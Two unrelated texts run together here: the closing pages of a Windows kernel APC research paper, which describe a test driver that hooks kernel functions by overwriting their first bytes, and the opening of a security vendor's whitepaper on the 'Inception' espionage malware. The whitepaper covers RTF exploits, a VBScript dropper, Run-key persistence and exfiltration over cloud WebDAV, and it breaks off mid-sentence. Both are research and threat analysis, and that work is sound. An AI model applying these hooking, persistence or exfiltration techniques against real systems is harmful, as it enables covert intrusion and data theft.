companion CD of  his book,  Undocumented Windows 2000 Secrets. The CD image can be 
downloaded from Mr. Schreiber site at:  
http://undocumented.rawol.com/  
In spite of having been written for  Windows 2000, w2k_load still works like a breeze under Vista.  
Loading the driver is as simple as entering  
 W2k_load apctest.sys  
And to unload it:  
 W2k_load apctest.sys /unload  
Once the driver is loaded, run TestClt to call it, specifying a command line sw itch to select the test to 
run.  TestClt without parameters gives the following output, listing the switch values  
Usage: 
 
    TestClt /d - APC disable test  
    TestClt /u - APC user mode test  
    TestClt /2 - APC user mode test #2  
    TestClt /s - APC spur ious int test - VISTA SP1 ONLY. OTHER VER => BSOD!!!  
 
    TestClt /h - This help  
What The Driver Can Do  
The driver performs four different APC tests, implemented as dispatch routines for custom I/O control 
codes.  Each test writes its output to the kernel d ebugger, so you  will need to run Wi ndows in a kernel 
debug session  to see the results.  
APC Spurious Interrupt Test  
This test is described in the section  Can The APC Interrupt Really Break into The Wrong Thread?  and 
shows h ow a DPC interrupt can pass  ahead of  an APC one, causing the latter to occur in the wrong 
thread.  
The code for this test does dangerous thin gs and can crash the syst em. 
33 
 This code works only with the ntoskrnl.exe which is part of Vista SP1.  It will almost c ertainly crash any 
other version of ntoskrnl.exe.  
This code works correctly only on a uniprocessor system. It is possible to boot a multiprocessor 
system in single processor mode with the “onecpu” data type of bcdedit.  
All the output from this test is writ ten to the debugger console, so it is  required  to run Windows in a 
debug session to see the result.  
To perform this test run:  
 TestClt /s  
Test Code Description  
Hooked Kernel Functions  
To verify that the APC interrupt occur in the wrong thread, the driver i nstalls two hooks in the kernel: 
one at the beginning of nt!SwapContext, the other one at the beginning of nt!KiDeliverApc.  
These hooks are installed by overwriting the first 8 bytes of the function s with an absolute jmp 
instruction to the hook routine. Th is job is done by assembly language functions enclosed in 
KernelHooks.asm. For instance, SetKDAPHook  installs the hook into nt!KiDeliverApc.  
While  the hook is  being  set, interrupts are disabled to prevent the processor from being hijacked , 
which would put as at risk of executing the  same  machine instructions which are being overwritten. 
However if the system has more than one processor, another processor may stumble on the function 
while it is being modified and crash the system. This is the reason why this  code only works on 
uniprocessor systems.  
The hook routines, which are also part of KernelHooks.asm, save the processor state, then call a C 
function (one for each hook) which traces  the call. When the C function returns, the hook routine 
restores the proc essor state, executes a copy of the original instructions that were at the beginning of 
the hooked function , then jumps into the function  itself, which will go on  executing  normally.  
Such an hook is specific to one version  of ntoskrnl (in our case, Vist a SP1) because the hook routine  
contain a copy of the first instructions of the hooked function and jump s after them to a fixed offset  
into the  function. Any variation in the function executable image will result in  inconsistent code and a 
jump to a wrong add ress.  
Furthermore, nt!SwapContext and nt!KiDeliverApc are not exported, so I used their offset s from 
ntoskrnl starting address to compute their run -time address. A different ntoskrnl will not match with 
these offsets, so the hook bytes will be written at a  wrong address.  
The hook routines are KDAPHook and SWCNHook inside KernelHooks.asm.  
C Trace Routines  
The hook routines are an interface between the hooked kernel function and the rest of the driver. 
They call C routine s which trace  the call to the hooked f unction. KDAPHook calls KiDeliverApcTrace 
and SWCNHook calls SwapContextTrace.  
These trac ing functions are called with interrupts disabled an d they don’t call any kernel DDI , to be as 
invisible as possible to the system.  
34 
 To trace the call, these routines s tore information in a static buffer in non -paged memory.  The 
functions managing this buffer are enclosed in CircBuffer.cpp.  
Both tracing functions check a static flag named bHookTraceOn : if it’s false, they don’t write anything 
into the buffer.  
KiDeliverAp cTrace clears this flag when it detects it has been called in the context of the thread which 
scheduled the APC. This stops the trace when the APC is  about to be  delivered.  
Both trace routines write “records” into the buffer, i. e. copies of C structures c ontaining the traced 
information. There are different structure types for different trace data and all types begin with a 
RecordType member identifying them.  
 Main  Test  Function  
The main te st function is ApcSpuriousIntTest and begins by initializing a spec ial kernel mode APC.  
 Then it raises the IRQL to DISPATCH, preventing thread dispatching.  
Afterwards, ApcSpuriousIntTest s chedules the APC by calling nt!KeInsertQueueApc, which, in turn, 
requests the APC interrupt, because the APC is for the current thread . This interrupt remains pending, 
because it is masked by the IRQL being DISPATCH.  
Then the function spins in a loop waiting until a DPC interrupt is pending as well. This is bound to 
happen when the timer interrupt handler determines that the thread has u sed all  its time slice and 
must be pre empted.  This interrupt also is masked by the DPC IRQL.  
To detect when  a DPC interrupt is pending, we rely on the fact that at + 0x95 inside the _KPCR for 
the executing processor is a byte array of interrupt flags.  
When the byte at 0x95 + 1 is 1, an IRQL 1 (APC) interrupt is pending  
When the byte at 0x95 + 2 is 1, an IRQL 2 (DISPATCH) interrupt is pending  
The presence of this array can be inferred by analyzing the code of  functions like 
hal!HalpCheckForSoftwareInterrupt , hal!HalpDispatchSoftwareInterrupt , 
hal!HalRequestSoftwareInterrupt . 
When the DPC interrupt arrives, ApcSpuriousIntTest  install the hooks and lowers the IRQL to passive, 
allowing the interrupts to fire. The hook s trace the execution of nt!SwapContext and nt!KiDeliverApc, 
along with the necessary data at the time of the hooked call.  
The APC kernel routine (ApcKernelRoutineSIT) writes a record into the buffer  as well , so that we can 
know when it is called with respect to the other traced events.  
Finally, Apc SpuriousIntTest writes a record into the buffer after KeLowerIrql returns.  
Before leaving, ApcSpuriousIntTest removes  the hooks and calls DumpTrace  which write s the records 
stored in the buffer to the debugger console.  
Sample Trace  
The following is sample t race obtained with the driver:  
APCTEST - Thr: 0X84AD0D78; *** APC SPURIOUS INTERRUPT TEST ***  
 
35 
  
APCTEST - Thr: 0X84AD0D78; APC initialized: 0X84FB11A4  
 
APCTEST - SWAP CONTEXT trace  
 
 
APCTEST -  Current IRQL:                    0x1b  
APCTEST -  Current threa d:                  0X84AD0D78  
APCTEST -  Current thread K APC pending:    1  
APCTEST -  Current thread K APC list empty: 0  
APCTEST -  Current thread U APC pending:    0  
APCTEST -  Current thread U APC list empty: 1  
 
APCTEST -  New thread:                      0X84D689F0  
APCTEST -  New thread K APC pending:        0  
APCTEST -  New thread K APC list empty:     1  
APCTEST -  New thread U APC pending:        0  
APCTEST -  New thread U APC list empty:     1  
 
APCTEST -  APC INT:                         1  
 
APCTEST - DELIVER APC trace  Spurious APC int in the wrong thread  
 
 
APCTEST -  Current IRQL:                    0x1  
APCTEST -  Caller address:                  0X8181F2F7  
APCTEST -  Trap frame:                      00000000  
APCTEST -  Reserved:                        00000000  
APCTEST -  PreviousMode:                    0  
 
APCTEST -  Thread:                          0X84D689F0  
APCTEST -  Thread K APC pending:            0  
APCTEST -  Thread K APC list empty:         1  
APCTEST -  Thread U APC pending:            0  
APCTEST -  Thread U APC list empty:         1  
 
APCTEST - SWAP CONTEXT trace  Swap Context back to the initial thread  
 
 
APCTEST -  Current IRQL:                    0x1b  
APCTEST -  Current thread:                  0X84D689F0  
APCTEST -  Current thread K APC pending :    0 
APCTEST -  Current thread K APC list empty: 1  
APCTEST -  Current thread U APC pending:    0  
APCTEST -  Current thread U APC list empty: 1  
 
APCTEST -  New thread:                      0X84AD0D78  
APCTEST -  New thread K APC pending:        1  
APCTEST -  New thread K APC list empty:     0  
APCTEST -  New thread U APC pending:        0  
APCTEST -  New thread U APC list empty:     1  
 
36 
 APCTEST -  APC INT:                         0  
 
APCTEST - DELIVER APC trace  APC delivery  
 
 
APCTEST -  Current IRQL:                    0x1 
APCTEST -  Caller address:                  0X8181F2F7  
APCTEST -  Trap frame:                      00000000  
APCTEST -  Reserved:                        00000000  
APCTEST -  PreviousMode:                    0  
 
APCTEST -  Thread:                          0X84AD0D78  
APCTEST -  Thread K APC pending:            1  
APCTEST -  Thread K APC list empty:         0  
APCTEST -  Thread U APC pending:            0  
APCTEST -  Thread U APC list empty:         1  
 
APCTEST - KERNEL ROUTINE trace  
 
 
APCTEST -  Thread:                          0X84AD0D78  
APCTEST -  Thread K APC pending:            0  
APCTEST -  Thread K APC list empty:         1  
APCTEST -  Thread U APC pending:            0  
APCTEST -  Thread U APC list empty:         1  
APCTEST - TRACE MESSAGE: Returned f rom KeLowerIrql  
APCTEST - Thr: 0X84AD0D78; WaitCycles = 765646  
 
Atypical Traces  
While testing the driver, I observed two types of atypical traces, which are worth mentioning . 
Trace Without Context Switch  
The first type are traces where the first event trac ed is the APC delivery in the correct thread. There is 
no traced nt!SwapContext, so no interrupt in the wrong thread. We know that when the IRQL is 
lowered a DISPATCH interrupt is pending, because the driver checks this condition, however we don’t 
see a co ntext switch.  
The explanation is probably that the DISPATCH interrupt did not cause a context switch,  perhaps  
because the thread dispatcher chose to let our thread run for another time slice.  In general, not every 
DISPATCH interrupt results in a context sw itch. For instance,  we might have come across an  interrupt 
raised by a driver which scheduled a DPC, while the thread still had some of its time slice left  
Here is an example of this kind of trace  
APCTEST - Thr: 0X84E96030; *** APC SPURIOUS INTERRUPT TEST *** 
 
 
APCTEST - Thr: 0X84E96030; APC initialized: 0X8511E0EC  
 
APCTEST - DELIVER APC trace  The first event is nt!KiDeliverApc  
37 
  
 
APCTEST -  Current IRQL:                    0x1  
APCTEST -  Caller address:                  0X8181F2F7  
APCTEST -  Trap frame:                      00000000  
APCTEST -  Reserved:                        00000000  
APCTEST -  PreviousMode:                    0  
 
APCTEST -  Thread:                          0X84E96030  
APCTEST -  Thread K APC pending:            1  
APCTEST -  Thread K APC list  empty:         0  
APCTEST -  Thread U APC pending:            0  
APCTEST -  Thread U APC list empty:         1  
 
APCTEST - KERNEL ROUTINE trace  
 
 
APCTEST -  Thread:                          0X84E96030  
APCTEST -  Thread K APC pending:            0  
APCTEST -  Thread K APC list empty:         1  
APCTEST -  Thread U APC pending:            0  
APCTEST -  Thread U APC list empty:         1  
APCTEST - TRACE MESSAGE: Returned from KeLowerIrql  
APCTEST - Thr: 0X84E96030; WaitCycles = 243152  
 
Trace With APC Interrupt Not Outstanding  
The second type of trace is similar to the first sample , where the context switch did occur, but shows 
an interesting difference.  
In all the traces, the nt!SwapContext data  also include  whether an APC interrupt is pending at the 
time of the cal l. This i s done in order to confirm that nt!SwapContext is actually called while the APC 
interrupt is still outstanding.  
For this type of trace, however, we see nt!SwapContext being called, with the pending APC, but 
without the interrupt:  
APCTEST - Thr: 0X85145388; APC initialized: 0X850AF0EC  
 
APCTEST - SWAP CONTEXT trace  
 
 
APCTEST -  Current IRQL:                    0x1b  
APCTEST -  Current thread:                  0X85145388  
APCTEST -  Current thread K APC pending:    1 the APC is pending  
APCTEST -  Current thread K APC list empty: 0 
APCTEST -  Current thread U APC pending:    0  
APCTEST -  Current thread U APC list empty: 1  
 
APCTEST -  New thread:                      0X84D689F0  
APCTEST -  New thread K APC pending:        0  
38 
 APCTEST -  New thread K APC list empty:     1  
APCTEST -  New thread U APC pending:        0  
APCTEST -  New thread U APC list empty:     1  
 
APCTEST -  APC INT:                         0  no APC int  
 
*** No APC delivery trace afterwards, b/c no APC int.  
 
APCTEST - SWAP CONTEXT trace  
 
 
APCTEST -  Current IRQL:                    0x1b  
APCTEST -  Current thread:                  0X84D689F0  
APCTEST -  Current thread K APC pending:    0  
APCTEST -  Current thread K APC list empty: 1  
APCTEST -  Current thread U APC pending:    0  
APCTEST -  Current t hread U APC list empty: 1  
 
APCTEST -  New thread:                      0X84F62D78  
APCTEST -  New thread K APC pending:        0  
APCTEST -  New thread K APC list empty:     1  
APCTEST -  New thread U APC pending:        0  
APCTEST -  New thread U APC list emp ty:     1  
 
APCTEST -  APC INT:                         0  
 
[...] 
 
We know that:  
 nt!KiInsertQueueApc is called when the IRQL is already DISPATCH, so the APC int errupt  
cannot be serviced before we l ower the IRQL  to PASSIVE.  
 We lower the IRQL to passive after having set the hooks, so we cannot miss the APC 
interrupt  
 The call to nt!SwapContext cannot have occurred while  nt!KiInsertQueueApc was in the 
process of queuing the APC , i. e.  before it raised the APC interrupt, because we called 
nt!KiInsertQueueApc at DI SPATCH, so no context switch  can occur inside it. Besides, even if 
we did not set the IRQL at DISPATCH, nt!KeInsertQueueApc sets it to profile (0x1b) before 
calling nt!KiInsertQueueApc.  
The explanation may be that nt!KiInsertQueueApc found SpecialApcDisabl e set. When this happens, 
the function does not raise the APC interrupt, although it sets KernelApcPending, which is the 
situation in the trace  above.  
But who then set SpecialApcDisable? Possibly, the code handling an hardware interrupt which 
occurred whil e the test was in progress. Such interrupts were not masked by the DISPATCH IRQL.  
39 
 APC Disable Test  
This test has been introduced in the section  Effect of _KTHREAD.SpecialApcDisable Being Set . It 
shows the effect of the SpecialApcDisable  flag on nt!KiDeliverApc. To perform this  test run the client 
with the command:  
 TestClt /d  
APC User Mode Test  And APC User Mode Test #2  
Introduced in the section  User Mode APC Delive ry Test in The Sample Driver , shows the interaction 
between user mode APCs and the k ernel wait functions. To run them:  
 TestClt /u  
 TestClt /2  for #2 
 
All the output is se nt to the kernel debugger.  
40 
 References  
[1] - Albert Almeida ; Inside NT's Asynchronou s Procedure Call ; Dr. Dobb’s Journal, Nov 01,2002. 
Available at http://www.ddj.com/windows/184416590  
[2] – David A. Solomon, Mark E. Russinovich; Inside Microsoft Windows 2000; Third Edition; Microsoft 
Press 
[3] - Doing Things "Whenever" - Asynchronous Procedure Calls in NT ; The NT Insider,Vol 5, Issue 1, 
Jan-Feb 1998 ; Available at  http://www.osronline.com/article.cfm?id=75  (registration required ). 1  
Whitepaper:  
The Inceptio n Framework : 
Cloud -hosted APT  
 
     
By Snorre Fagerland  and Waylon Grange  
Blue Coat Systems, Inc  
 
  
2 Executive summary  
 
Blue Coat researchers have uncovered a previously -undocumented, highly 
automated, and extremely sophisticated framework for performing targeted attacks. The framework is notable for a number of reasons, including (but not limited to) its use of a cloud- based infrastructure for command- and-contr ol and its 
use of the WebDAV protocol to send instructions and receive exfiltrated information from compromised systems.  
 Initial m alware components were  embedded in Rich Text Format (RTF)  files. 
Exploitation of vulnerabilities in this file format is lever aged to gain remote access 
to victim’s computers.  
 The framework, thus far, has been using the services of a cloud service provider based in Sweden, CloudMe.com, for its main command- and-control 
infrastructure. Malware payloads designed for a wide array of  potential devices, 
including home routers and mobile devices running iOS, BlackBerryOS or Android, were also recovered during the course of our research.  
 The framework is designed in such a way that all post -infection communication 
(i.e. target surveying, configuration updates, malware updates, and data exfiltration) can be performed via the cloud service. The malware components of this framework follow a plugin model, where new malware rely on other, previously delivered malware components to interact with the framework.  
 
Initial a ttack s were  largely focused on Russia and a few other Eastern European 
countries. However, we have later  seen that attackers are interested in targets all 
over the globe.  
 The framework is itself target -agnostic, and seems highly automated.  
 The operational security exhibited by the attackers is very good -  among the best 
we have seen. Most interaction between attackers and their infrastructure is performed via a convoluted network of router proxies and rented hosts.  
 Although the attackers have left a few clues, we have been unable to provide 
attribution with any degree of accuracy.  
   
 
3 Introduction 
 The use of software vulnerabilities in order to execute malicious software on unsuspecting users’ computers is an importa nt parameter to monitor. This 
method of attack is not only known to have a considerable success rate, it is also often deployed by  resourceful attackers and, as such, marks a threat worth 
paying attention to.  
 The use of exploits in document formats like P DF, DOC and RTF is in some 
ways especially noteworthy. Documents are commonly exchanged via mail, which make them perfect for email -borne targeted attacks; what is otherwise 
known as spear phishing . 
 In March, 2014, Microsoft published information about a new vulnerability in Rich Text Format (RTF). This vulnerability, named CVE -2014- 1761 (Microso ft Word 
RTF Object Confusion), had already been used effectively by attackers at the time of the announcement. Two previous vulnerabilities in the RTF file format, known as CVE -2010- 3333 and CVE -2012- 0158, had become, by that time, 
mainstays of targeted attacks, so we tracked how attackers implemented this new exploit with keen interest.  
 By late August, w e identified a malware espionage operation that used both the 
CVE-2014- 1761 and CVE -2012- 0158 vulnerabilities to trigger execution of the 
malicious payload, and which leveraged a single c loud service as the backbone 
of its entire visible infrastructure.  
 When w e examined the suspicious documents, it was discovered that they were 
somewhat anomalous compared to the run- of-the-mill material. They  turned out 
to be long to a highly advanced and professional targeted attack framework , 
which utilized a complex series of  techniques to survey potential targets.   
 Due to the many levels of obfuscation and indirection, we named this the 
Inception framework ; but there ends all similarity with the movi e by the same 
name. Leonardo Di Caprio is not associated with this investigation.  
  
 
4  
 
PART I:  
CloudMe  
  
 
5 Use of trojanized documents  
 
We initially kne w little about who the actual targets were; apart from one.  In that  
particular case we had  the actual phishing email , so we kne w the apparent 
recipient – the CEO of a large Russian bank. The email  was apparently sent from  
“Mrs. World” ; note the Mrs.,  and not Miss  - World.   
  
 
 The weaponized Microsoft Word document attached to the email message (“photo.doc”) contained two separate exploit s: one target ing the vulnerability 
detailed in CVE -2012- 0158 (MSCOMCTL ActiveX Buffer Overflow) ; the other 
targeting the aforement ioned CVE -2014- 1761.  
  
 
6  
 
Above: “Mrs. World” . Text and picture apparently taken from the news site mk.ru 
 
 We soon discovered that our malware repository contained several other, similar 
documents, but these had come from other sources which did not include the email message, or any identifiable information about the targets. However, the text of the documents co vered a variety of topics mostly revolving around 
Russian issues relating to a variety of business sectors. The following pages highlight a representative selection of these documents.  
  
 
7  
 
An article cribbed verbatim from the 
Novye Izvestiya news Web site 
about  the Russian financial situation 
in light of the Ukrainian crisis.  
     
 
An application form to  participat e in 
a seminar supposedly organized by 
Russia’s Federal Service for 
Defense Contracts  (“Федеральная 
служба по оборонному заказу ”) 
scheduled for Sept 24/25 2014.  
 
  
An article , in English, about the 
Ukraine situation taken from  the 
Financial Times (UK) newspaper . 
 
       
 An “advertisement” from a supplier of diesel engines and related mechanical services. The letter lists the Russian navy and the Border Guard department of the FSB among their customers.  
 
 
8  
“Organigrama Gobierno Rusia.doc” 
– a summary profile of several high-
level Russian government officials  – 
originally submitted to VirusTotal from an IP address in Spain.  
             An advertisement of a used car for 
sale that purportedly originated from  
an employee at the German Embassy in Moscow . 
  
              
Invitation to Russian Art Week  
  
 
9 Document metadata  
 
 All documents that we have found so far have been rather standard Word 
documents, of the old 97- 2003 compatible format based on OLE2.  
 Such documents can, and typically do, contain quite a bit of metadata: The name of the document creator; the user who edited it most recently; the name of the 
company whose copy of Word was used to create the document, et al. Users can optionally configure Word to remove this metadata when a document is saved, and that’s exactly what the creator of these documents did, strippin g out this 
potential source of attribution data.  
 However, Word documents in this format contain additional information, if you know where to look.  
 All Word documents of this format contain what’s known as a File Information Block (FIB). The FIB contains information about the file’s internal structure, and also – to some extent – data on the program used to create the file. In the case 
of the samples we analyzed, all of the documents were saved using the same build of Microsoft Word from Office14 (better k nown as Office 2010).  
 In addition, documents can contain slack space in which old data remains. For 
example, the decoy that came with the attack named “Organigrama Gobierno 
Rusia.doc” contains Visual Basic leftovers indicating that it originally was creat ed 
on a computer that was configured to be used by a native Spanish speaker, apparently by an advisor at the Spanish Embassy in Moscow. This document was presumably obtained by the attackers and repurposed for the attack.  
 
 
10 Targeted verticals  
 
 Desp ite the limited information at our disposal about the targets of these attacks, 
their content reveals some context about who the possible targets may have been.  
  
First of all, we have the decoy documents which indicate an interest in:  
 
- Embassies  
- Politics  
- Finance  
- Military  
- Engineering  
 We also have a set of phishing mails, which were targeted at:  
 
- The finance sector in Russia 
- The oil and energy industry in Romania, Venezuela, and Mozambique  
- Embassies and diplomats from various countries  
      
 
11 Shellcode  
 
 The shellcode used is a pretty standard variant previousl y used by a number of 
campaigns  typically operating out of China, but with some minor changes.  The 
malicious content is stored inside the document in encoded form, and the shellcode decodes and writes this to disk.  
  
 
Above: The decoding loop  
 
 Upon successful execution this code  drops a Word document and a V isual Basic 
script.  The Word doc ument  is displayed to the user to avoid arousing any 
suspicion while the script is executed in the background.  
 Unusual for many exploit campaigns, the names of the dropped files vary ; for 
example HyHa9AJ.vbs , ew_Rg.vbs , 0_QHdN.vbs , etc. – clearly randomized in 
order to avoid detection by name.  
   
 
12 Visual Basic Script  dropper  
 
 The VB Script dropper code is also a little unusual . It declares a Windows 
Management Instrumentation (WMI) object in order to reach components  like the 
registry and file system. This seems adapted from Microsoft example code , like 
the one found at http://msdn.microsoft.com/en -us/library/aa387236(v=vs.85).aspx
 
   
   When t he VBSript is run it drops two files to disk . One is a polymorphed dll file 
and the other a  binary data  file with no obvious internal structure.  This data file 
turns out to be encrypted using AES -256. 
   
 
13 The files will be installed in several locations:  
 
%WinDir%,    ex.  “C:\Windows”.  
%APPDATA%,   ex.  “C:\Users \USERNAME\ AppData \Roaming”  
%ALLUSERSPROFILE% ,  ex. “C:\ProgramData”  
%CommonProgramFiles% , ex. “C:\Program Files \Common Files”  
%USERPROFILE% ,  ex. “C:\Users \USERNAME”  
 
These locations will vary some between operating system versions.  
 
The VBScript then set s a startup key in the 
“HKCU\ Software \Microsoft \Windows \CurrentVersion\ Run” registry path to 
execute the DLLs at boot time.  
 Regardless of whether the registry launches the DLL or when another malware executable starts the DLL directly, the DLL is launched using  regsrv32.exe with 
the /s (silent) option.  
 The names of these dropped files change from attack to attack. The one above drops ctfmonrc.dll . Other names observed were:  
 ctfmonm.dll  
ctfmonrn.dll  
wmiprvse.dll  
alg.dll 
dwm.dll  
 The encrypted data files are named using random words apparently taken from a dictionary – “acholias ”, “arzner ”, “bicorporate” , “crockrell ”, “damnatorily ” etc.  
        
 
14 DLL payload  
 
Looking at one of the dropped dll s we can see the authors originally called it 
95Num3P3gm.dll.polymorphed.dll .  When executed it will rebuild the original dll  
(95Num3p3gm.dll , presumably),  load it from memory  and pass over execution.   
 
  
 In the early stages of our research, most other payloads followed the same naming convention, eg., fvK3J15B5d.DLL.polymorphed.DLL; LvwU9gnFO.DLL.polymorphed.DLL; NR5vaFTe9R.DLL.polymorphed.DLL;  
hs78lg7x5F.DLL.polymorphed.DLL, etc. More recently collected samples no longer contain the “polymorphed” string.  
 It is hard to describe the polymorphed dlls with any real depth,  as there is little 
consistency between them.  When t wo nearly identical dlls are encoded using the 
polymorphic scheme there is very little code in common.  The call graphs are different a nd key functions have varying number of arguments. The polymorphing 
mechanism also generates, and inserts, unique functions all of which make calls to different floating -point operations –  all done just to obfuscate the actual 
decoding process.  The sizes of buffers allocated are also randomized to mask 
their intent .  
 
 
15  
 
A portion of one of the dynamically generated functions.  
 What is common is that somewhere along the execution cycle is one extremely large function (over 200 kb in length) where early in a large allocation is made 
where the un- obfuscated binary will be placed.  The binary is then built from de-
obfuscating segments  of it that have been dispersed through the ‘ .rdata ’ section.  
The order, size, and locations of these segments  vary from build t o build but 
somewhere near the end of the large function there will be a call to a subfunction 
that loads the PE image into memory , followed by a call to free the PE image 
allocation from memory. Simply halting execution before this function call permits a researcher to extract the reconstructed DLL from memory.  
 
 
16  
 
 Here, pausing execution before the call to ‘load_pe_from_memory’ reveals the extracted PE at the memory address pointed to by edx.  
 This reconstructed  DLL, once loaded, will decode a configuration structure from 
its ‘.data’ section which contains three important details: the name of the encrypted data  file dropped by the VBScript ; the AES key used to decrypt the file;  
and the name of a unique global mutex t o hold while running to prevent multiple 
instances.  
 This configuration information is used to load the encrypted file into memory  and 
decrypt it . This  turns out to be yet another dll . The first ordinal exported by this  dll 
is located and then  called,  pass ing in the configuration and the name of the 
encrypted file on disk  as parameters . 
 
 
17  
 
 
This last dll is the heart of the  threat  (originally called q5Byo.dll in this instance.  
This file  contains the true intent of this campaign.  It is designed as a survey tool. 
The PE file gathers system information including OS version, computer name, 
user name, user group membership, the process it is running in,  locale ID’s,  as 
well as system drive and volume information.  All of this is encrypted and then 
sent to cloud storage via WebDAV .  
   
 
18  
 
 
The malware installation chain   
 
 
19 WebDAV c loud usage  
 
WebDAV is a communication standard that allows file management over HTTP  
or HTTPS . Windows allows WebDAV sessions to be mapped as network 
resources.  
 The use of WebDAV as the communication channel is atypical for most malware 
samples we see. By using a network resource , the actual web traffic originates 
from the system  itself,  and not from the process in which the malware resides. 
Additionally, once the resource is esta blished , the malware can transfer files to 
and from the command and control servers using standard file IO commands.   
 All the authentication information for the WebD AV session including the URL , 
folders, path, user name, and password is  stored within this last DLL  in another 
AES- encrypted configuration structure in the binary.  
 A unique path, username, and password were  used for each malware instance 
we’ve seen in the wild.  This allows the attackers to uniquely identify every  
targeted attack and track how successful each phishing campaign is . 
 Also contained within the configuration structure is information on how to name the survey data on the remote file server.  The binary reads from its configuration a string on how to generate the r emote filename,  and a list of extensions to use.  
An example would be “_1- 7d_0- 8s”, [“TIF”, “TAR”, “SIT”] which instructs the 
binary to generate a filename with 1 to 7 numeric digit characters followed by 0 to 
8 ASCII letters with one of the three listed extensions such as “664gher.TAR”.  The survey is then uploaded to the server in a specified folder with the generated name.   
 Files are compressed using a modified LZMA -compression and encrypted using 
AES cipher -block -chaining (CBC) before being uploaded t o the cloud server.  
 The binary also checks a separate folder  on the cloud service designated to 
contain new configuration information. If such a file is present on the server, the 
malware downloads the new configuration file then deletes it  from the serve r.  
   
 
20 The cloud storage provider in every case we have seen was the Swedish 
company CloudMe.com,  which offers free and paid WebDAV cloud storage.  
 
 
  The URI model used by the malware is 
http://webdav.cloudme.com/%username%/CloudDrive/  which is a direct 
reference to file storage.  
 
It must be noted that the CloudMe service is not actively spreading the malicious 
content; the attackers are only using it for storing their files.  
 
We notified CloudMe.com about the abuse of their services. Their  CEO, Mr. 
Daniel Arthursson, was none too happy about this, and was very helpful in our further research. CloudMe has shared a great deal of log information related to this attack. These indicate that there are  many other accounts (over 100) likely 
related to this attack system. We have no way of verifying this with absolute 
certainty, but this is what we regard as a high confidence assumption.  
 
  
21  
Distribution of logged victim connections to wards  CloudMe.  
 
 
The cloud accounts are not used for one- way communication only. The malware 
also checks configured subfolders for updates; and if these are found they will be 
downloaded, decrypted and used as appropriate.  
 One such case is the franko7046 accoun t, used against the previously 
mentioned bank CEO. In t his account there was hidden anothe r encrypted 
configurat ion file which the malware downloaded and decrypted.  
 
 
Above: The configuration file of the depp3353 account.  Password is redacted.  
 
 
22 This is how we found the depp3353  account. In this new account there was 
another surprise waiting for us –  a download folder with two new encrypted files , 
921.bin and 922.bin. Once decrypted, these turned out to be PE executables.  
 
 Downloaded  plugins : Cloud persistence  
 The two new executables are plugins - quite similar  to each other  and obviously 
compiled on the same setup . They  are lightweight and intended to pull specific 
survey information from their target.  Of interest, both of the DLLs originally had 
the same inter nal name ( 78wO13YrJ0cB.dll ).  Presumably the same PE 
sanitization script  and parameters were used on both.  
 None of these plugins  contain any means of CnC  communication. Instead, when 
they are executed they are passed a pointer to a function to use for  sending  data 
back home. Neither are they ever written to disk. They are executed in memory only, and once they have completed the memory is freed.  This makes these 
modules extremely stealthy, flexible and compatible  with multiple toolsets  
independent of w hat CnC method is being used.  
 921.bin retrieves several datapoints about the infected machine: Domain info; a list of running processes with all loaded modules in each; the list of installed software; and a complete hardware profile of the target machine.  922.bin 
compiles a dirwalk – a complete listing of every file path – of each fixed drive. All 
of this information is exfiltrated back via the same WebDAV connection.  
 This model makes it possible to do the intrusion in steps, with verification stages in between; and the files will not be easily found on affected computers.  
 Based on the information gathered from these modules , the attackers appear to  
move to the next stage of their attack by placing more new components  on the 
WebDAV share s. Information ab out these uploads is limited by the fact that we 
do not have the AES keys to decrypt much of the uploaded data, but we have 
been able to see some upload patterns .  
 What we assume to be third -stage plugins appear on the shares as *.bin files of 
roughly 72k b. As with other plugins, these are downloaded and deleted from the 
share in one go. However, the next day, another *.bin file of the same size will be uploaded to the share. This is a pattern that repeats itself over all live accounts. It 
seems that b ecau se the plugins exist in memory only, they are injected dai ly to 
ensure persistence on victim computers.  Our theory is that this malware is a 
more typical datastealer, and w e have observed that after this type of file is 
planted on the account, encrypted data uploads from compromised users 
increase.  
  
 
23 The Sheep and the Wolves  
 
Victims of this attack will connect using the Windows WebDAV redir ector, and 
the HTTP request use r-agent string will reflect this. For Windows XP this will 
typically be “ Microsoft -WebDAV -MiniRedir/5.1.2600”, and for Windows 7 a 
common  user-agent is “ Microsoft -WebDAV -MiniRedir/6.1.7601”.  
 Security r esearchers – and there are a few of them -  connect in a variety of ways; 
first of all, we see a number of connections that are indistinguishable  from the 
way victims connect. This happens when researchers use lab machines with live internet access to run the malware. The only way we can tell these are researchers is because they connect from IP address ranges that are unlikely to be victims; and they also tend to consist of short -lived sessions.  
 Some researchers set up scheduled tasks to scan the shares for new updates and malware. We see a few variations of these –  one typical configuration is 
where the requests contain a Python- related user -agent string.  
 Attackers, on the other hand, don’t appear to use Windows.  
Common across multiple accounts, multiple IP’s, and over time, is that the probable attackers have used a HTTP user -agent of “davfs2/1.4.6 neon/0.29.6”.  
 We know these are not researchers, because we can see malware files being 
uploaded by them:  
 
[17/Sep/2014:09:42:38 +0200] "PUT 
/white3946/CloudDrive/QxM9C/st/V1oINDJtnqy/1768.bin 
HTTP/1.0" 201 0 "-" "davfs2/1.4.6 neon/0.29.6" 
 
Above: Log entry for the account white3946.  We have been unable to locate the 
malware that uses this account.  
 
We have a log fragment in which the attackers uploaded a sequential series of 
updates (from 1746.bin to 1774.bin) within 1.5 hou rs on Sept 17
th, spread over 
27 different accounts and using  27 different IP addresses in the process.  
 The user -agent string  shows that attackers likely have used a client based on the 
open source davfs2 file system for Linux to mount the WebDAV shares.  
 
  
24 This client  is used when uploading new malware, but also w hen the attackers 
scan thei r shares for new victim updates, in which case the  shares are 
enumerated by requests in a sch eduled manner.  
 
 
An attacker scans the tem5842 account for updates.  
 
 
 At intervals, scans hop to new IP addresses.  
 
The attackers  have used a large number of  IP addresses to access the shares . 
As mentioned above, there is a rotation scheme in place in which a new IP 
address will be used after a few minutes of access against CloudMe accounts.  
 These IP ’s are distributed widely over  geographical locations and service 
providers , with a heavy bias towards South Korean ranges .  
  
 
25  
S. Korea  85 Australia  1 
China  7 Austria  1 
United States  7 Bulgaria  1 
Brazil  5 Canada  1 
Sweden  3 Denmark  1 
Czech Republic  2 France  1 
Norway  2 Germany  1 
Romania  2 Kuwait  1 
Russia  2 Latvia  1 
Spain  2 Ukraine  1 
 
Distribution of attacker  IP addresses  
 
 At first we thought these IP’s belonged to  some commercial proxy service, 
particularly since several such proxy services also of fer IP rotation. However, this 
turned out to be a wrong assumption.  
   
 
26  
 
PART I I:  
Support infrastructure 
  
 
27 An e mbedded device proxy network   
 
A superficial  examination of the proxy  IP addresses  that connected to CloudMe 
